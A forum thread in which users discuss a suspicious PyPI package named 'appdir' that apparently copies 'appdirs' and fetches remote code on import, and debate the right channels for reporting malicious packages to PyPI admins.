Appdir package on pypi seems to be a fraudulent/mistaken re-release of appdirs

The appdir package appears to be a fraudulent or mistaken re-release of the long-existing appdirs package. It has no repository home, its release notes are a direct copy of the appdirs package, there is no info about why it was created as a duplicate, and the maintainer email address is a known pseudonym (lele@qq.com) that has had multiple fraudulent App Store releases removed from both the Apple and Google app stores.

2 Likes

I wonder if maybe it would be better to report this at one of these:

I am really not sure.


Aside:

This project seems to have taken over the functionalities of appdirs / xdgappdirs:

I reported it here because it’s not an actual PyPI security issue nor is it a pypi bug. There is already a pipi about the fact that there is no good way to report these issues :).

Thanks for the pointer to platformdirs! It has a clear statement about why it was forked from appdirs, which makes me feel much better about it.

Is there any process for the PyPI admins to contact the alleged maintainers of appdir? I don’t particularly want to be phished by them.

From what I understand, pypi-support is the correct venue for this (and that’s the place PyPI admins monitor actively, not this forum).

As for contact, I believe there’s something in the TOC that says it’s up to the user to provide valid contract information and PyPI has the right to remove things otherwise, or something like that. PyPI admins (I’m not one) have experience dealing with this kind of stuff and know exactly what to do, so you don’t need to worry about that (unless you are the one that published the package, of course :smirk:)

I have filed an issue on pypi-support as it looks like the package tries to download and run code from a remote server when imported, which is surely malicious.

2 Likes

Thanks all for the help here. If pypi-support is the correct venue for this, then it would be great to see the pypi help FAQ expanded to explain this, so that users like me who discover suspicions packages know to report it.

You can probably open a bug and submit a PR for that at GitHub - pypa/warehouse: The Python Package Index.

pypi-support doesn’t seem to offer a way to report malicious packages. Click on “New issue”, which option should one choose to report a malicious package? appdir was reported under PEP 541 but even if that were correct (which I do not think that it is), it would’ve been completely non-obvious.

1 Like

In general, malicious or fraudulent packages should be reported directly to admin@pypi.org and/or security@python.org.

These will result in the name simply being blocked. If you want the name for yourself, please use the process through pypi-support.

I sent an email to admin@pypi.org yesterday about these packages here. I’ve no idea if it reached anyone, and I personally don’t see a reason that malware should be reported privately.

Feel free to publicise it as well, but the important thing is that it’s reported directly.

Well, it’s not self-evident that sending an email is more direct or more effective than opening a ticket on pypi-support. I would also guess that time availability is a bigger factor than the communication medium used to reach the PyPI admins.

1 Like